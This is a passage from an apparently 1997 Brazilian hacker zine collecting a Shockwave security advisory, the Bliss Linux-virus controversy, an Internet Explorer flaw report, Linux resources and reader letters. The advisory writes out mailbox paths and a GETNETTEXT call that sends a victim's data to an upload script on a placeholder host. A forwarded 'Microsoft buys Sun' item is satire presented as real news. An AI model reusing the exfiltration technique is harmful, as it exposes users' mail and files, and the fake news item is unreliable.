de que estarei checando seus browsers. Paul Merenbloom e vice-presidente de pesquisa de tecnologia na Piper Jaffray, em Minneapolis. ******************************************************************* Lista Informativa MeuPovo. -------------------------------------------------------- Subject: Shockwave security alert ! As informacoes abaixo podem ser achadas em : http://www.webcomics.com/shockwave/mail.html -------------------------------------------------------------------------- Shockwave Security Alert 10-Mar-97 --- reported by: David de Vitry -- updated 20-Mar-97 What is this about? There are three potential security holes through Shockwave. All three require Shockwave, and all three are fixed with a Security Fix from Macromedia, issued 3/19/97. Information in your email, on your hard drive or on your corporate intranet could all be copied to a distant server. All three have been verified by Macromedia. This chart details each: Security Hole Affects Description Reading email Netscape 2-3, on Win 95 / NT or Mac Shockwave can read mail folders from Netscape, Eudora, and others that use a similar mail file format. Internal Websites Netscape, IE, others? on Win 95/ NT or Mac Shockwave has access to any website the you have access to. This include corporate intranets and personal webservers. Any local file Netscape 2.02, 3.0 on Win 95 / NT or Mac Shockwave also has access to any local file on the users hard drive. The filename must be guessed by the attacker, pulling a directory tree is not possible. This problem was discovered by Dave Yang. also: How information is copied to a website | What you can do | What are they saying Internal Websites. Users of Corporate intranets who have shockwave installed are potentially vunerable. A malicious shockwave movie could have access to your internal website, and potentially internal websites or personal sites. Once the program accesses potentially confidential information, information can be copied to a website on the internet. Users of Microsoft IE should be aware that Shockwave will automatically install when entering a page with a Shockwave movie on it. Users are presented with an authenticode digital certificate. However, the signature on it is from Macromedia, and not the author of the potentially malicious shockwave movie. Reading Email A developer can use Shockwave to access the user's Netscape email folders. This is done assuming the name and path to the mailbox on the users hard drive. For example names such as: Inbox, Outbox, Sent and Trash are all default names for mail folders. The default path to the "Inbox" on Win 95/NT would be: "C:/Program Files/Netscape/Navigator/Mail/Inbox". Then the developer can use the Shockwave command "GETNETTEXT" to call Navigator to query the email folder for an email message. The results of this call can then be feed into a variable, and later processed and sent to a server. To access a message, for example, the first message in a users Inbox for Netscape mail users, would be called using the following location: For Windows: mailbox:C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0 For MacOS (thanks Jeremy Traub) mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbo x?number=0 Note: I have not yet added links for Eudora or similar email readers, but these are also vunerable to this problem. if these links all give you an error (such as folder no longer exists), then you might not have anything to worry about. However, if you see an email message in a pop up window, and you have Shockwave installed, then you are vulnerable to this security hole. Show Me an example! Here it is, a Shockwave movie that will read your email. This will not work for everyone, it is currently only setup to work with Win95 / NT, but it could be extended to identify the browser (Jeremy Traub). Reading Local Files Shockwave also has access to any local file on the users hard drive. This problem was discovered by Dave Yang. Details of how this is accomplished will not be released due to the serious nature of this problem. An demo of this problem is available. Again this information accessed then copied to a website. Interesting, but how can information be copied to a website? This is a well known operation. See the Full Details Any information that a shockwave movie has access to can potentially be copied to a website on the internet. This information could then be sent back to a server cgi program that accepts this type of information. This is done using long urls, where the information is passed as a query within the location through the getnettext command. i.e. GETNETTEXT "http://www...com/upload.cgi?data=This_could_be_your_content_here". This can all happen with out the user ever noticing. Here are just a few types of information that a malicious developer could obtain using this hole: Your email Any file on your local hard drive Any file on any website you have access to Help: What can I do to protect myself? The only recommendation I have at this point is to Install the newest version of Shockwave. Mac users just need to change the name of their hard drive to protect their local files, however, shockwave still has access to webservers. VIRUS DE LINUX(?) ---------------------------- Subject: [LINUX-BR] bliss http://www.math.ucsb.edu/%7Eboldt/bliss/ Fernando M.R.M. ---------------NOTA DO EDITOR---------------- O URL acima contem uma serie de links para textos interessantes, desmistificando o assunto. Talvez os textos mais importantes relativos ao fato sejam os que coloquei abaixo: * PRESS RELEASE DA MCAFEE SOBRE O VIRUS BLISS * MCAFEE DISCOVERS FIRST LINUX VIRUS; SHIPS NEW VERSION OF VIRUSSCAN TO DETECT AND REMOVE BLISS VIRUS SANTA CLARA, CALIF. (February 5, 1997) -- McAfee (Nasdaq: MCAF), the world's leading vendor of anti-virus software, today announced that its virus researchers have discovered the first computer virus capable of infecting the Linux operating system. The Linux operating system is a publicly supported freeware variant of the Unix operating system that runs on Intel-based personal computers. The virus, which is called Bliss, is significant because many in the Unix industry have previously believed that viruses were not a concern to Unix operating system users. Unix operating systems are typically difficult to infect with viruses since a virus writer must have administrative privileges to infect a given Unix system. McAfee researchers believe that one reason this virus has begun to spread is because Linux users who are playing computer games over the Internet, such as DOOM, must play the game in the Linux's administrator mode, which is called "root." "Bliss is a destructive virus which overwrites Linux executables with its own code," said Jimmy Kuo, McAfee's director of anti-virus research. "Although several incidents of Bliss infection have already been reported, the virus is not currently widespread. We encourage concerned Linux users to download a free working evaluation copy of our VirusScan for LINUX, which can be used to detect the virus." The History of Bliss Very little is known about the history of the Bliss virus. McAfee discovered the Bliss virus two days ago, and posted a solution Wednesday evening on its web site. The virus is believed to have been created as a research project several months ago by an anonymous programmer, and until recently was not an "in-the-wild" threat. Recently, reports of the virus have begun to surface within Linux Internet news groups. How Bliss Works Bliss infects Linux executable files. Each time Bliss is executed, it overwrites two or more additional files. Because the virus makes its presence known by overwriting and destroying files each time it executes, users are immediately alerted to its presence. Bliss overwrites the first 17,892 bytes of each affected file with its own code. According to McAfee anti-virus researchers, all files infected by Bliss are irrecoverable. Although the virus does not operate under traditional operating systems such as DOS, Windows, Windows 95, Windows NT, NetWare and the Macintosh, files created in these aforementioned operating system formats and stored on Linux file servers are vulnerable to corruption by Bliss. McAfee Ships World's First Bliss Virus Scanner As a public service, McAfee has developed a special update of its VirusScan for LINUX software which provides an antidote for the virus. The free working evaluation version of the product can be downloaded from McAfee's web site at www.mcafee.com.. McAfee has also provided the virus sample to other anti-virus vendors, so that they too can develop solutions to protect their customers. [Parte editada - A McAfee e' popular demais pra precisar de publicidade deste Fanzine] McAfee's Web address is http://www.mcafee.com. ### ESTA E' A RESPOSTA SOBRE A "DESCOBERTA" DO VIRUS FEITA MCAFEE Subject: Re: [masq] 1st virus in Linux :( (fwd) From: Russ Allbery <rra@cs.stanford.edu> Date: 1997/02/08 Newsgroups: linux.dev.kernel Ambrose Au <achau@wwonline.com> writes: > In case you do not notice, there is a new destructive virus called Bliss > which infects Linux executables. > Its target is users who play games such as doom over the Internet with > root access. > Details at Mcafee's website: http://www.mcafee.com/corp/press/020597.html This is not a virus in the way the term is used for operating systems without memory protection. Any program being run as root has priviledges to modify the file system and do damage to your system; this is why you do not run general binaries as root. All this is is a simple Trojan Horse, based on the idea of getting stupid people to run unknown binaries as root, with an interesting side twist of modifying other system binaries when it runs. McAfee's statements about this are, at best, misleading. To quote from their web site: McAfee (Nasdaq: MCAF), the world's leading vendor of anti-virus software, today announced that its virus researchers have discovered the first computer virus capable of infecting the Linux operating system. Whatever you would like to call this, it quite definitely isn't anything new. Trojan Horse binaries for Unix systems have been around for years, as have Trojan Horse modified source distributions; there was a CERT several years ago about IRC, for example. The virus, which is called Bliss, is significant because many in the Unix industry have previously believed that viruses were not a concern to Unix operating system users. The implication behind this statement is patently absurd. Obviously, as anyone who knows anything about Unix is aware, if you run a hostile program as root it can do all sorts of nasty things to your system. Duh. Again, McAfee is attempting to portray this as some major new problem when it's nothing of the sort. We encourage concerned Linux users to download a free working evaluation copy of our VirusScan for LINUX, which can be used to detect the virus. No thank you. Linux doesn't need a virus checker; Linux administrators need to use some basic intelligence about what they run as root. People who run binary-only packages obtained from untrusted sources as root on their system get exactly what they deserve. It looks to me like McAfee is attempting to use this as a publicity stunt to promote their software business and to attempt to scare Linux users into paying them money. I'll refrain from speculating about how much of a threat a real operating system is to a company who makes its living on protecting users of less sophisticated operating systems from their inherent limitations. McAfee just flushed all respect I had for them down the toilet. -- Russ Allbery (rra@cs.stanford.edu) <URL:http://www.eyrie.org/~eagle/> -------------------------------------------- Subject: Re: [masq] 1st virus in Linux :( (fwd) From: alan@lxorguk.ukuu.org.uk (Alan Cox) Newsgroups: linux.dev.kernel > It's a virus in the old sense all right. No. Its a trojan. If the superuser doesn't run a binary containing it then it cannot affect more than the binaries a user has created of their own. Having the superuser run random user installed binaries could do far worse. > its own remover, if you execute a binary with some weird option in the GNU > long option style, and in that if creates a log of its activities. Thats actually a bug - its meant to exec the 'log' copy. > Actually, I fail to understand the need of people to relabel a virus as a > trojan. Because there are specific distinctions in security between a program which actively operates and seeks to attack system resources or applications to infect things and a trap that sits waiting for someone dumb enough to run it. McAffee are also wrong in that its the first unix virus for other reasons, such as the fact if you class it as a virus then people have demoed other similar tools. Those kind of latent trojans are big business in the military security/information warfare world, and thus I'd also suspect soon in the realms of sabotage and the less legal side of things. Once you've got the BLISS source reversed BTW you can port it to just about any OS I can think of including stuff like NT and VMS in a matter of of minutes Followups to linux-security and or bugtraq ----------------------------------- BUG NO INTERNET EXPLORER Subject: displayStory.pl?97033.wbug.htm By Bob Trott InfoWorld Electric Posted at 3:04 PM PT, Mar 3, 1997 A security flaw has been revealed in Microsoft's Internet Explorer (IE) browser that allows devious Web page writers to use .LNK and .URL files to surreptitiously run programs on a remote computer, even when the browser is set to its highest security level. The security lapse was discovered by a Worcester Polytechnic Institute student in Massachusetts who was posting documents on a Web page and created a shortcut to the folder rather than copying it. The student, Paul Greene, accessed the shortcut, and File Explorer popped up into the folder. Greene then used Internet Explorer's version of the shortcut, .URL files, by changing the setting to file://filename. Although .LNK files only work in Windows 95, .URL files are compatible with both Windows 95 and Windows NT 4.0. When run through Navigator or other non-Microsoft browser, the files merely display the written command. The shortcuts can be set to be minimized during execution, meaning users may not know that a program has been started, Greene said. "The ramification for IE is that any anti-Microsoft jerk can set up their Web site to be destructive to anyone using Internet Explorer and safe for all others browsers," Greene said. Microsoft planned to have information about the security flaw posted Monday afternoon, with a fix to follow soon thereafter, said Dave Fester, lead product manager for Explorer. Fester was quick to point out that the security breach could be triggered only by someone who intentionally sought to do so. And the malicious Web author must know what programs are on the remote computer in order to target them, he said. "A Webmaster has to know what specific programs are on (the target's) hard drive, as well as the path to use to activate through a link," said Fester. However, hackers with any knowledge of DOS and Windows 95 know what programs are on a given PC. Also, Greene and two other students who built several bug demos, Geoffrey Elliott and Brian Morin, said a .BAT file can be copied to the Internet Explorer cache and executed from there, where the standard path points to all programs. The Explorer bug can be tested at http://www.cybersnot.com/iebug.html. Microsoft Corp., in Redmond, Wash., is at http://www.microsoft.com/. Please direct your comments to InfoWorld Electric News Editor Dana Gardner. Copyright ) 1997 InfoWorld Publishing Company @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ LINUX DICAS, ENDERECOS, ETC.. > > perdido. O meu maior problema e que eu nao sei quais arquivos devo pegar para formar o Linux !! > > Alguem poderia me ajudar !! > > Vamos l'a... deixa eu fazer minha boa acao do dia :) Acho que serao varios e longos dias :-D !! > Para instalar o Linux voce deve recorrer a uma distribuicao. Isto e' > a um conjunto de pacotes que alguem ja se dignou a selecionar e distribuir > com um sisteminha de instalacao simpatico. Ou seja ja fez o trabalho duro. > Daria para fazer na mao tambem, mas eu duvido que voce preferira e para falar > a verdade nao conheco ninguem que tenha tido paciencia de faze-lo. > Que distribuicao utilizar ? Bom... eh uma questao em aberto e se voce > fizer a pergunta na lista recebera quilos de respostas que nao levarao a lugar > nenhum. Vai muito dos gostos e necessidades pessoais. Entao o melhor a fazer > e conhecer as caracteristicas das principais e ver qual se adapta mais ao seu > gosto e necessidade. Outra opcao eh utilizar a distribuicao do seu guru parti > cular de forma a facilitar o trabalho dele, isto e' e voce tiver algum. > Aqui vai uma rapida descricao: > > slackware: tem a vantagem de ser possivel instalar facilmente de > diquetes. Eh o sistema mais cru e com menos aplicativos, mas nada impede que > voce posteriormente instale-os separadamente. Nao possue um sistema de controle > dependencias. > > RedHat: eh o que possui o sistema de instalacao mais simpatico e com > controle de dependencias razoavel. Possui o maior numero de aplicativos inclu > ive alguns nao free-software. Ganhou o premio de melhor distribuicao de sistema > operacional para PC ano pasado. A meu ver esse me parece ser a melhor opcao !! > debian:antiga distribuicao da free software foundation. Possui um siste > ma de instalacao muito decente e com um controle de dependencias bem rigido, > porem e' em modo texto, o que nao chega a ser um problema. Possui tambem uma > boa selecao de aplicativos. A principal vantagem e a estrutura do filesystem > compativel com a do SVR4( ou seja solaris e cia). Eh a que eu utilizo. > Para comprar o bizu e' a cheapbytes: http://www.cheapbytes.com. > Para fazer ftp ftp.sunsite.dcc.unicamp.br > Voce pode ler uma comparacao entre as distros na pagina do Linux Journal > > Subject: [LINUX-BR] Queres um Linux "pequeno" para baixar...? (fwd) Vai na ftp.sunsite.unc.edu/pub/Linux/Incoming e pega o Dilinux ou DOSLinux... Sao uns 7 arquivos de 1.4Mb e mais um executavel. Depois de descompactar e instalat teras um Linux que boota via DOS e roda em ambiente texto... Se quiseres o ambiente grafico vais ter que pegar mais umas "coisinhas" ;) Mas com isto ja da para le ligar ao provedor de acesso e navegar na rede. TTS T+ SUPER PAGINA DO LINUX Gostei tanto que coloquei aqui o conteudo do URL abaixo. O autor, Marcelo, ta' fazendo um trabalho legal e a URL dele (http://www.dca.fee.unicamp.br/~malheiro/linux/index.html) Os links abaixo foram tirados da pagina dele e o cara aceita inclusoes. http://www.dca.fee.unicamp.br/~malheiro/linux/serv.html Servicos, Paginas e Documentacao sobre Linux no Brasil Documentacao Linux FAQ em Portugues http://www.inf.ufrgs.br/~kojima/linux/faq-linux.html Linux Documentation Project - mirror 1 http://www.conectiva.com.br/LDP/linux.html Linux Documentation Project - mirror 2 http://www.opensite.com.br/linux/linux.html LDP-br Home Page http://www.dca.fee.unicamp.br/~malheiro/linux/LDP-br.html Portuguese HOWTO - mirror http://www.conectiva.com.br/LDP/HOWTO/Portuguese-HOWTO.html Dicas Imprimindo do Linux em uma rede Windows http://www.pop-ms.rnp.br/~pbastos/samba.html Sobre Virtual Hosts http://www.dowell.com.br/virtual.html Paginas diversas Grupo de Usuarios Linux do IME/USP http://www.ime.usp.br:80/gu-linux/ Pagina do Rxo http://www.geocities.com/SiliconValley/Park/6151/linux.html Mecanismos de Busca Pesquisa no histrico da lista Linux-br http://www.openline.com.br/linux-br/swish.html - via Swish http://www.openline.com.br/linux-br/ghindex.html - via Glimpse Canais de IRC #Linux na BrasNet - assuntos diversos http://www.sjinfo.com.br/~madmax/linux/ Listas de Discussao Linux-br - assuntos diversos http://www.openline.com.br/linux-br/ Para se inscrever mande um mail para listproc@listas.ansp.br com subscribe linux-br [seu nome] no corpo da mensagem. LinuxISP-BR - Linux em provedores de acesso http://www.conectiva.com.br/listas/LinuxISP-BR/ Para se inscrever mande um mail para LinuxISP-BR-request@listas.conectiva.com.br com apenas subscribe no campo de subject/assunto. LDP-br - Lista da iniciativa LDP-br Para se inscrever mande um mail para ldp-br-request@listas.sonet.com.br com subscribe no campo de subject/assunto. Linux - assuntos diversos Para se inscrever mande um mail para majordomo@opensite.com.br com subscribe linux no corpo da mensagem. Sites de FTP CCE/UFPR - Slackware 3.2, StarOffice 3.1, Kernels e XFree 3.2 *new* ftp://cce.ufpr.br/pub/linux/ CCE/UFPR - Arquivo da lista Linux-br ftp://cce.ufpr.br/pub/linux-br/ FEE/UNICAMP - RedHat, Slackware, Sunsite ftp://ftp.fee.unicamp.br/pub/Linux/ IC/UNICAMP - Sunsite http://sunsite.unicamp.br/pub/operating_systems/Linux/ ftp://sunsite.unicamp.br/pub/operating_systems/Linux/ IC/UNICAMP - GNU Software http://sunsite.unicamp.br/pub/packages/gnu/ ftp://sunsite.unicamp.br/pub/packages/gnu/ IF/USP - Sunsite, TSX-11, Debian, RedHat, Kernels, Java, Perl, Tcl/Tk, X11R6, e mais... ftp://linux.if.usp.br/pub/mirror/ IME/USP - Debian ftp://paprika.ime.usp.br/pub/linux/ Inside - Sunsite (quase completo) *new* ftp://ftp.iis.com.br/pub/Linux/ Openline - RedHat ftp://ftp.openline.com.br/mirror/ SJ Internet - Slackware, Kernels, HOWTOs ftp://ftp.sjinfo.com.br/pub/linux/ UNICAMP - GNU Software ftp://ftp.unicamp.br/pub/gnu/ UNICAMP - Java para Linux ftp://ftp.unicamp.br/pub/languages/java/linux/ _________________________________________________________________ ################################### NOTICIAS Subject: [LINUX-BR] Linux no Espaco Texto extraido da coluna vitrine da revista Exame, de 26/03/97 "Qual sistema operacional vai controlar os experimentos de gravidade a bordo da proxima missao espacial do onibus espacial da Nasa ? Errou quem pensou no Windows de Bill Gates ou em alguma criacao do Steve Jobs. O sistema escolhido e um Linux, distribuido de graca na Internet, que esta em 5 milhoes de computadores no mundo todo. Esse sistema alternativo surgiu a partir de uma ideia do finlandes Linus Thorvald em 1990 e se desenvolveu com a colaboracao de mais de 200 especialistas no mundo virtual. 'O Linux e o sucessor moderno do sistema UNIX, desenvolvido nos anos 60 e 70 nos laboratorios Bell, da AT&T', afirma Bruce Perens, colaborador no projeto do Linux, que tambem trabalhou na animacao do filme Toy Story. Para os cientistas da Nasa, o Linux e mais confiavel do que todos os sistemas operacionais disponiveis comercialmente." Tai pessoal uma prova in contest de que o Linux esta quente nas paradas. Saudacoes. Subject: [LINUX-BR] Micro$oft vai comprar a Sun Microsystems Pasmem com as afirmacoes do Bill. . . Noticia fresquinha. . . []'s, G. >Date: Mon, 31 Mar 1997 17:04:01 -0800 >From: mas@acm.org (Mark Stalzer) >Subject: Microsoft buys Sun > >This item may be of some interest to RISKS readers, given all of the >discussions about ActiveX and Java. -- Mark > > - - - - - - - - - - - - - - - > >Redmond WA, March 31 (Routers) - Microsoft Corporation announced after the >close today that it will buy Sun Microsystems in a deal valued at $11.7 >billion. The price works out to $50 a share, which is a premium over Sun's >close at $34. Microsoft will finance the deal by issuing 50 million shares >of common stock, using some of its cash reserves, and borrowing $5 billion >at "very low rates" from a "long time strategic partner" rumored to be Intel >Corporation. Every 4 shares of Sun stock will be exchanged for 1 share of >newly issued Microsoft stock plus approximately $100 in cash. > >Bill Gates, Microsoft's Chairman said "It's time to kill Unix. Unix is >providing stiff competition to Windows NT in the server arena. We have >already placed NT on Digital and HP servers, and Sun was the only >substantial holdout. So we decided just to purchase Sun to assure that >their servers ship with NT." He continued, "We also wanted control over >Java to better position ourselves to, uh, compete with Netscape." > >The deal was approved earlier today by the boards of both companies. Large >institutional holders of Sun are known to favor the deal so it should get >shareholder approval in the coming weeks. Privately, a Sun board member >said "the price was so sweet, we would be violating our responsibility to >the shareholders if we didn't accept the offer." Scott McNealy, Chief >Executive Officer of Sun, was unavailable for comment. Several Sun >employees expressed dismay, one adding simply that "this sucks." > >When asked about transition plans for Solaris, Sun's version of Unix, Taj >Raji, Sun's Vice President of Systems Software, said that the "Solaris APIs >will be wrapped around the NT megakernel in a seamless fashion to produce a >robust feature-rich operating environment." A Microsoft spokesperson >quickly added that "only native NT applications certified by Microsoft get >to use the flying windows logo." > >Speculation about Intel's possible involvement centered on the SPARC chips >that power Sun's servers. Intel might incorporate the SPARC architecture >into their planned Hexium "You're Inside" family of processors. If these >chips were used in Sun servers, analysts say that Intel would lock up the >worldwide processor market. > >As for Sun's Java technology, if Microsoft follows their standard practice, >they will make proprietary enhancements to assure market share. One insider >suggested that they might make "Java more like C++", but others said that >would be foolish. April Austin, a technology analyst with Hambust-Quick in >Oakland CA, commented that "the buyout could really put a crimp on Netscape >since Microsoft will control the two major means of placing active content >on the web, ActiveX and Java. Microsoft will set the standards and Netscape >will always be six months behind the feature curve." > >A spokesperson for the Department of Justice said there was no official >comment on the proposed transaction. Although, a highly placed Justice >source felt that there shouldn't be any problems because "Microsoft is a >software company and Sun is a hardware company." > >The combined company's yearly sales will be approximately $16 billion based >on end-of-year figures. For the day, Microsoft (MSFT.O) was up 1 5/8 at 97 >7/8 and Sun (SUNW.O) was up 3 3/4 at 34. Officials at the Pacific Stock >Exchange reported that the volume on Sun April 30 calls was 15 times >normal. The SEC is investigating possible insider trading. > >------------------------------ Sobre o artigo "Curriculo Vitae e o Fussador de Micro" me enviaram isto p. complementar. Jovens na faixa dos 20 anos nao tem lealdade a empresa, mas querem subir rapidamente na profissao (Tirado do Estado de Sao Paulo - 29/set/96) JOANN MULLER The Boston Glose Os jovens na faixa dos 20 anos estao ingressando nos locais de trabalho dos Estados Unidos e se afirmando de uma maneira jamais imaginada pelas geracoes anteriores. E quem podem censura-los por isso? Convencidos de que nada se ganha escalando pacientemente os degraus do poder nas empresas, os trabalhadores da chamada "Geracao X" -nascidos entre 1964 e 1975 - estao exigindo poder e status irnediatamente. Se percebem que nao estao entrando no circos dos poderosos e influentes nem estao conseguindo as qualificacoes de que precisam para melhorar sua carteira, esses jovens nao se importam absolutamente em mudar de emprego. Isso criou um novo hiato entre as geracoes nos locais de trabalho dos Estados Unidos. Os chefes da geracao anterior- nascidos entre 1946 e 1964-se queixam de que os "pirralhos" tem pouca capacidade de concentracao e carecem de uma forte etica do trabalho. Ou, entao, sao rudes, ambiciosos e impacientes. Os trabalhadores mais jovens afirmam que tais atitudes sao .simples mente uma tatica de sobrevivencia para uma geracao que foi testemunha de macicas demissoes na decada de 90 e concluiu que a lealdade a uma empresa e perda de tempo. "Nos Ihes ensinamos que ser leal nao e mais uma coisa segura", disse Clama Pmines, de 49 anos, consultora de empresas de DemTer e autora do livro Twentysomething: Managing and Motivating Today's New Work Force (Vinte e Poucos: Administrando e Motivando a Nova Forca de Trabalho) "Nao e sinal de inteligencia comprometer-se com a companhia." Mudancas-Desse conflito de gerenciamento empresarial, que poderao trazer mudancas aos locais de trabalho. Na realidade, a znica lealdade que esses novos trabalhadores demonstram e a si proprios. Isso comeca quando eles entram na faculdade, onde sao forcados a assumir a responsabilidade pela propria realizacao profisisional. "Estamos incentivando as pessoas a tracar seu proprio roteiro na vida, sem esperar que as companhias o facam, disse Wendy Baker, que dirige o centro profissional do Babson College. E, para dar mais destaque a esse ponto, Babson acabou com o "centro de colocacao", uma especie de bolsa de empregos, que rotineiramente arranjava trabalho para os estudantes mais velhos. Contudo, para administrar suas proprias carreiras, a atual geracao de jovens tem um enorme desejo de informacao. Esses jovens exigem que seus chefes os mantenham informados a respeito das decisoes importantes e frequentemente querem dados atualizados sobre o andamento e os planos futuros da companhia \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ CARTAS -------------------------------------- danielbss@pobox.com se apresentou como o responsavel pela carta anti-spam ("como ficar preso" parodia da carta "como ficar rico pela internet"). Veja bem. Ele assumiu a autoria da parodia, nao da original, que apareceu em tudo quanto e' lista de discussao.. -------------------------------------- Ola Amigos, O TechnOraculo e'um zine sobre Internet e Informatica , depois da versao texto numero 01 lancada recentemente agora quero apresentar a versa= o HTML da mesma edicao 01 com todos os recursos que esse formato proporciona= http://www.geocities.com/SouthBeach/5970/ ------------------------------------- Derneval: Solicito informacoes sobre alguns termos usados no mundo hacker. Estou desenvolvendo um material e nao gostaria que a minha interpretacao destes termos dertupasse o mesmo, por isto, ca estou. Os termos sao os seguintes; wannabe looser lammer cyberpunk RESPOSTA: wannabe : O inicial seria hacker wannabe. E' o cara que so' ouviu falar de hacking, talvez leu algum livro como o do Shimamura ou do Littman e quer aprender mais sobre o assunto. O problema e' que a grande maioria acha que o melhor caminho e' o mais "mastigadinho". Ele quer ser chamado de "hacker", mas nao quer suar sozinho p. aprender. As vezes algum deles encontra o caminho. looser : O cara que so' quer usar o computador como se fosse uma caneta. Em outras palavras, nao quer aprender nada alem do necessario para digitar e imprimir um texto. Nao importa de comprar um Pentium com win95 e CDROM so' pra digitar cartinhas e odeia quando precisa aprender a mexer com algum programa novo. lammer : Varias definicoes. A mais comum e' um cara que finge ser algo que nao e' (ex. um hacker). Tambem usada contra caras que assumem autoria de trabalhos que nao sao seus. Um cara que nao merece nenhum respeito pelo que faz, por ir contra qualquer etica. cyberpunk : Isso e' invencao da midia. Seria o hacker +++ do futuro. Na verdade, o termo costuma ser usado por pessoas que querem se referir ao ambiente meio "blade-runner" do atual estagio das telecomunicacoes. O pessoal do computer underground americano nao adotou a terminologia, por lembrar que o termo "punk" nos EUA e' homossexual passivo. Ha' um certo preconceito contra a palavra cyber, mas esta ja' alcancou uso no CUD. Uma definicao melhor voce consegue seguindo a carta abaixo, tirada do linux-br Subject: [LINUX-BR] Hackers Para quem ainda tinha alguma duvida sobre a diferenca entre hackers e crackers, estou deixando uma versao HTMLizada do New Hacker's Dictionary em http://www.brasil.enemy.org/~claudio/jargon. -------------------------------------------- USO DE MAIL-BOMBER > > Atencao Bando de Lamahs: > > A partir de hoje todas as listas acima submetidas estao EXPULSAS da esquina. Os > imbecis que continuarem > assinados as listas, receberao diariamente uma chuva de mail flood. 500 por dia > ta bom? > > > Saudacoes!! > CyberHack > COMENTARIO DO EDITOR: Isso foi um caso que rolou na Esquina das Listas ha' algum tempo. Alguem descobriu como usa um mail-bomber e usou para fazer um flood de 900 cartas para todas as listas acima. Uma amostra de como alguem pode detonar com toda e qualquer etica... E' o caso basico do individuo que se vai se ferrar, cedo ou tarde, pelo simples fato que faz algo esperando uma reacao do mesmo tipo. E acaba sendo pego pelo simples fato de que tem mais de uma maneira de se esfolar um gato. ALGUNS LINKS DO MEU BOOKMARK http://www.trouble.org/ - Dan Farmer Internet Survey Sec http://www.cs.princeton.edu/sip/pub/spoofing.html - Secure Internet Programming: Web Spoofing: An Internet Con Game http://www.wired.com/news/technology/story/2615.html - Wired News: DoubleClick Tries to Force Hand into Cookie Jar http://www.jya.com/whp1.htm - William H. Payne News (contra NSA cifers) http://jya.com/bis_emoney.html - BIS - Development of E-Money - Oct 96 http://www.counterpane.com/whycrypto.html - Why Cryptography is harder than it looks.. http://www.psionic.com/papers.html - Craig Rowland's Technical Papers - TCPIP covert channels http://www.packet.com/packet/garfinkel/96/47/index2a.html - Packet: Simson Garfinkel - Technology - ActiveX http://www.cstp.umkc.edu/personal/bhugh/dicinfo.html - Distributed Internet Crack Info http://www.cybersnot.com/iebug.html - Internet Explorer Bug http://web.mit.edu/crioux/www/ie/index.html - Internet Explorer Does it Again http://dec.dorm.umd.edu/iebug.html - Yet another Internet Explorer bug: Examples http://www.webcomics.com/shockwave/ - Shockwave Security Alert http://jya.com/dfa.htm - Biham/Shamir Differential Fault Analysis of DES http://www.cl.cam.ac.uk/users/rja14/tamper.html - Tamper Resistance - a Cautionary Note http://www.privacy.org/pi/activities/idcard/ - PRIVACY INTERNATIONAL - National ID Cards Page http://www.inch.com/~dna/CIMWelcome.html - Museu de Inteligencia http://linuxwww.db.erau.edu/NAG/nag.html - The Network Administrators' Guide Linux http://electron.phys.dal.ca/nag/ghindex.html - The Network Administrators' Guide http://www.osf.org/~loverso/javascript/ - JavaScript Problems I've Reported http://Lisa.engelska.se/winnuke/ - Nuked - win nt attacks http://206.244.69.158/ - MyDesktop.com http://www.nd.edu/~mchapple/iw/start.html - Information Warfare http://www.psycom.net/iwar.1.html - Information Warfare, I-War, IW, C4I, Cyberwar http://www.seas.gwu.edu/student/reto/infowar/info- war.html#http://www.seas.gwu.edu/student/reto/papers/ - Information Warfare - definition http://www.seas.gwu.edu/seas/instctsp/DOCS/BOOK/book.html - BUILDING IN BIG BROTHER - book http://www.ndu.edu/ndu/inss/actpubs/act003/a003cont.html - What is information warfare? http://www.rand.org/publications/RRR/RRR.fall95.cyber/ - Information War and Cyberspace Security http://www-personal.umd.umich.edu/~nhughes/htmldocs/micro.html - Microserfs - WIRED 2.01 http://www.netforward.com/poboxes/?fradim - Uma coisa sobre livro http://www-personal.umd.umich.edu/~nhughes/htmldocs/nsa.html - NSA Handbook http://www.webcom.com/~~pinknoiz/coldwar/microwave.html - Microwaves and Mind Control http://www.cdsar.af.mil/apj/morris.html - Weapons of Mass Protection... http://www.jedefense.com/jed.html/ - Journal of Electronic Defense http://www.geocities.com/hotsprings/3368 - Lesoes por esforco repetitivo http://www.aimnet.com/~jnavas - Excelente tutorial sobre modens http://www.sns-access.com/%7Enetpro/maxmtu.htm - Como aumentar sua velocidade de carregamento de binarios no netscape e etcs.. ---------------------------------------------- URGENTE: EM VIRTUDE DE UM PROBLEMA COM MINHA CORRESPONDENCIA, NAO PUDE ATUALIZAR A LISTA DE PESSOAS QUE SE DISPUSERAM A "HOSPEDAR" O BARATA ELETRICA NAS SUAS WEB PAGES. SOUBE QUE TEM PESSOAS FAZENDO "MIRRORS" E ATE' MESMO FAZENDO VERSOES HTML DO BE. EU PENSO DA SEGUINTE MANEIRA: OU EU PONHO TODOS OU NAO PONHO NENHUM NOVO ATE' A PROXIMA EDICAO. PECO DESCULPAS PELA FALTA DE ATENCAO. DE QUALQUER FORMA, PESSOAS QUE ESTIVEREM INTERESSADAS EM COLOCAR O URL DE SUAS PAGINAS NO BARATA ELETRICA, DESDE QUE NAO TENHAM COISAS COMERCIAIS, MANDEM PRA rato.cpd@digicron.com E SUBJECT DO TIPO: "MINHA PAGINA" COM O URL. QUANTO AOS QUE ESTAO, POR ALGUMA RAZAO, DOIDOS PARA LER O BE EM HTML, AGUARDEM QUE NOS PROXIMOS DIAS TA' SAINDO... O 15 JA' TEM VERSAO EM HTML NO PRELO (falta so' corrigir os acentos e cedilhas, a versao no http://www.inf.ufsc.br/barata/ nao e' a definitiva) O TOP_QUARK@GEOCITIES.COM JA' ERA. O HACKER CRACKDOWN SERA' RETOMADO. NAO ENVIEM MENSAGENS PARA TOP_QUARK PORQUE ELE JA' PERDEU O ACESSO A CONTA EMAIL DELE NA GEOCITIES. PORQUE? NAO FOI PARANOICO BASTANTE E ESQUECEU A SENHA. DESCOBRIRAM TAMBEM QUE ELE TINHA TENDENCIAS A PARTICIPAR DISSO E CORTARAM A CONTA PARA ONDE A SENHA ERA ENVIADA. DESSE JEITO. ISSO TAMBEM PODE ACONTECER COM VOCE. E O PIOR E' QUE EU AVISEI... ELE CONTINUA A EXISTIR NA REDE, MAS O EMAIL TOP_QUARK@GEOCITIES NAO EXISTE MAIS. HA' UMA MONTANHA DE 